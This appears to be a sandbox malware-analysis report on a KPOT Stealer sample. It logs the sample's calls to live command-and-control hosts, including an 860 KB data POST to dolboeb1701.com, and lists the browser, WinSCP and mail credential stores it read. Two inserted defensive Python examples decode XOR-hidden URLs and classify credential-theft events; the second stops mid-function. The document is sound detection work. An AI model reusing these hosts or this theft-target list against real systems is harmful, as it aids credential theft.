Analysis Report SecuriteInfo.com.Trojan.GenericKD.36362611.3113.2129

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.2129 (renamed file extension from 2129 to exe)
Analysis ID: 356849
MD5: 9dc97eaed4e61901afc327ce9f122262
SHA1: 41881d3463f4246d4d0146faf39703354bab83e9
SHA256: 4412624d06991fa64f684fcc6d66c787d040eaa12356885cf0a0919c732c82a3
Tags: KPOTStealer

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Enables debug privileges
HTTP GET or POST without a user agent
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses 32bit PE files
Yara signature match

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.337105580.0000000002BF0000.00000004.00000001.sdmp | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x34d0:$s1: \x0C\x10\x10\x14^KK
  • 0x408d:$s1: ZFFB\x08\x1D\x1D
  • 0x34b0:$s2: \x86\x9A\x9A\x9E\x9D\xD4\xC1\xC1
  • 0x34c0:$s2: \xC7\xDB\xDB\xDF\xDC\x95\x80\x80

Unpacked PEs

Source | Rule | Description | Author | Strings
1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x34d0:$s1: \x0C\x10\x10\x14^KK
  • 0x408d:$s1: ZFFB\x08\x1D\x1D
  • 0x34b0:$s2: \x86\x9A\x9A\x9E\x9D\xD4\xC1\xC1
  • 0x34c0:$s2: \xC7\xDB\xDB\xDF\xDC\x95\x80\x80
1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x28d0:$s1: \x0C\x10\x10\x14^KK
  • 0x348d:$s1: ZFFB\x08\x1D\x1D
  • 0x28b0:$s2: \x86\x9A\x9A\x9E\x9D\xD4\xC1\xC1
  • 0x28c0:$s2: \xC7\xDB\xDB\xDF\xDC\x95\x80\x80

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Virustotal: Detection: 66%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Metadefender: Detection: 18%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | ReversingLabs: Detection: 79%
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Uses secure TLS version for HTTPS connections

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029837 ET TROJAN KPOT Stealer Initial CnC Activity M4 192.168.2.6:49785 -> 47.91.94.99:80
Source: global traffic | HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 | Host: bdns.by | Content-Length: 0
Source: global traffic | HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 | Host: bdns.co | Content-Length: 0
Source: global traffic | HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 | Host: bdns.im | Content-Length: 0
Source: global traffic | HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 | Host: bdns.io | Content-Length: 0
Source: global traffic | HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 | Host: bdns.link | Content-Length: 0
Source: global traffic | HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 | Host: bdns.nu | Content-Length: 0
Source: global traffic | HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1 | Host: bdns.pro | Content-Length: 0
Source: global traffic | HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 | Connection: Keep-Alive | Host: 47.91.94.99
Source: global traffic | HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 | Connection: Keep-Alive | Host: 47.91.94.99
Source: global traffic | HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 | Host: 47.91.94.99 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 | Host: 47.91.94.99 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1 | Connection: Keep-Alive | Host: dolboeb1701.com
Source: global traffic | HTTP traffic detected: GET /bgczXibj92HSlSCK/ HTTP/1.1 | Connection: Keep-Alive | Host: dolboeb1701.com
Source: global traffic | HTTP traffic detected: GET /bgczXibj92HSlSCK/login.php HTTP/1.1 | Connection: Keep-Alive | Host: dolboeb1701.com | Cookie: PHPSESSID=f84qhg8e3t915dmhm2crp648n2
Source: global traffic | HTTP traffic detected: GET /bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615 HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: dolboeb1701.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /bgczXibj92HSlSCK/util.php HTTP/1.1 | Content-Type: application/octet-stream | Content-Encoding: binary | Host: dolboeb1701.com | Content-Length: 860177 | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS traffic detected: queries for: bdns.by
Source: unknown | HTTP traffic detected: POST /bgczXibj92HSlSCK/util.php HTTP/1.1 | Content-Type: application/octet-stream | Content-Encoding: binary | Host: dolboeb1701.com | Content-Length: 860177 | Connection: Keep-Alive | Cache-Control: no-cache
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Section loaded: msxml3.dll
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: 00000001.00000003.337105580.0000000002BF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
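The three rule hits above come from SUSP_XORed_URL_in_EXE, which matches "http://" and "https://" hidden under a single-byte XOR key, a cheap trick stealers use to keep their C2 URL out of plain string dumps. The following is an added example written for this page, not code from the report, from Joe Sandbox or from the signature-base project that ships the rule: it brute-forces all 255 non-zero keys over a buffer, reports offset and key for every hit, and de-XORs the URL that follows the prefix, which is the step the YARA match itself does not do for you. The function names, the two keys (0x5A, 0xC3) and the scanned buffer are all constructed for the demo; a memory dump such as the ones listed above would be passed to `find_xored_urls()` as raw bytes.

```python
"""Added example: recover single-byte-XOR encoded URLs from a binary blob.
Not part of the Joe Sandbox report; the sample buffer is constructed."""

URL_PREFIXES = (b"http://", b"https://")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one single-byte key."""
    return bytes(b ^ key for b in data)


def yara_hex(plain: bytes, key: int) -> str:
    """Render plain^key as a YARA hex string, e.g. to pin a recovered key
    into a rule of your own: yara_hex(b"http://", 0x5A) -> { 32 2E 2E ... }."""
    return "{ " + " ".join(f"{b:02X}" for b in xor_bytes(plain, key)) + " }"


def decode_url(buf: bytes, off: int, key: int, max_len: int = 256) -> str:
    """De-XOR forward from `off` until the first byte that is not printable
    ASCII; a NUL terminator, whitespace or binary data ends the URL."""
    out = bytearray()
    for b in buf[off:off + max_len]:
        c = b ^ key
        if c < 0x21 or c > 0x7E:
            break
        out.append(c)
    return out.decode("ascii")


def find_xored_urls(buf: bytes):
    """Return sorted [(offset, key, url)] for every single-byte-XOR encoded
    http:// or https:// prefix in `buf`. Key 0 (plaintext) is deliberately
    skipped: plain URLs are a different, far weaker, signal."""
    hits = []
    for key in range(1, 256):
        for prefix in URL_PREFIXES:
            needle = xor_bytes(prefix, key)
            start = 0
            while True:
                off = buf.find(needle, start)
                if off < 0:
                    break
                hits.append((off, key, decode_url(buf, off, key)))
                start = off + 1
    return sorted(hits)


# Constructed sample: a fake header, two URLs hidden under different keys,
# some padding, and one plaintext URL that must NOT be reported.
SAMPLE = (
    b"MZ" + b"\x00" * 30
    + xor_bytes(b"http://example.invalid/gate.php\x00", 0x5A)
    + b"\x90" * 8
    + xor_bytes(b"https://cdn.example.invalid/p.bin\x00", 0xC3)
    + b"https://plain.example.invalid/\x00"
)

if __name__ == "__main__":
    for off, key, url in find_xored_urls(SAMPLE):
        print(f"0x{off:04x} key=0x{key:02x} {url}")
        print("   as YARA hex:", yara_hex(url[:7].encode(), key))
```

Two caveats when running this over real dumps: a long region of a repeated byte cannot produce a hit (the 't','t' and '/','/' pairs force unequal plaintext bytes onto equal input bytes), so false positives come almost only from genuinely XOR-wrapped data, but a multi-byte or rolling key defeats the check entirely, which is why the rule is tagged SUSP rather than treated as a conviction on its own.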
Source: classification engine | Classification label: mal72.spyw.winEXE@1/1@25/8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Mutant created: \Sessions\1\BaseNamedObjects\53E61D202B0F807656615
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 5 times)
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Virustotal: Detection: 66%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Metadefender: Detection: 18%
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | ReversingLabs: Detection: 79%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Process information set: NOOPENFILEERRORBOX (reported 13 times)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Registry key enumerated: More than 171 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Queries volume information: C:\ VolumeInformation (reported 3 times)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cookies
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail (reported 2 times)
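The browser section above is dominated by the same five Chrome files (Local State, Login Data, Cookies, Web Data, History) reached through ever deeper "Application Data\Application Data\..." prefixes. That is not an extraction artifact: in %LOCALAPPDATA% "Application Data" is a legacy junction that points back to the same directory, so a stealer that walks the profile tree recursively and follows junctions opens the same file once per nesting level. For triage it is the set of distinct credential stores touched, not the raw event count, that matters. The following is an added example written for this page (not code from the report or from Joe Sandbox) that parses lines in the shape used above, collapses the junction prefixes, groups the targets by the kind of credential they expose and gives a verdict. All function names are mine, the event lines are constructed for the demo, and the PuTTY registry key is listed as a well-known second location for the Putty/WinSCP signature even though this report only shows WinSCP.

```python
"""Added example: group sandbox file/registry events into credential stores.
Not part of the Joe Sandbox report; EVENTS below are constructed."""
import re
from collections import defaultdict

# One event per line, in the "Source: <proc> | <op>: <target>" shape used above.
EVENT_RE = re.compile(
    r"^Source: (?P<proc>.+?) \| (?P<op>File opened|File read|Key opened): (?P<target>.+)$"
)
# A "\Application Data" segment followed by another separator is the
# self-referential junction in %LOCALAPPDATA%; dropping it yields the real path.
JUNCTION_SEG = re.compile(r"\\Application Data(?=\\)", re.IGNORECASE)

# Credential-store indicators, grouped by what they expose. The PuTTY key is
# an assumption of this example (well known, but not observed in this report).
INDICATORS = {
    "browser": [
        re.compile(r"\\Google\\Chrome\\User Data\\(?:Local State|Default\\"
                   r"(?:Login Data|Cookies|Web Data|History))$", re.IGNORECASE),
    ],
    "sftp": [
        re.compile(r"^HKEY_CURRENT_USER\\Software\\Martin Prikryl\\WinSCP 2\\Sessions", re.IGNORECASE),
        re.compile(r"^HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions", re.IGNORECASE),
    ],
    "mail": [
        re.compile(r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\"
                   r"Windows Messaging Subsystem\\Profiles", re.IGNORECASE),
        re.compile(r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", re.IGNORECASE),
        re.compile(r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail", re.IGNORECASE),
    ],
}


def junction_depth(path: str) -> int:
    """How many times the path re-enters the Application Data junction."""
    return len(JUNCTION_SEG.findall(path))


def normalize_path(path: str) -> str:
    """Collapse the junction so every nesting level maps to one real file."""
    return JUNCTION_SEG.sub("", path)


def classify(target: str) -> str:
    for category, patterns in INDICATORS.items():
        if any(p.search(target) for p in patterns):
            return category
    return "other"


def triage(lines):
    """Return {category: {"events", "targets", "max_junction_depth"}}."""
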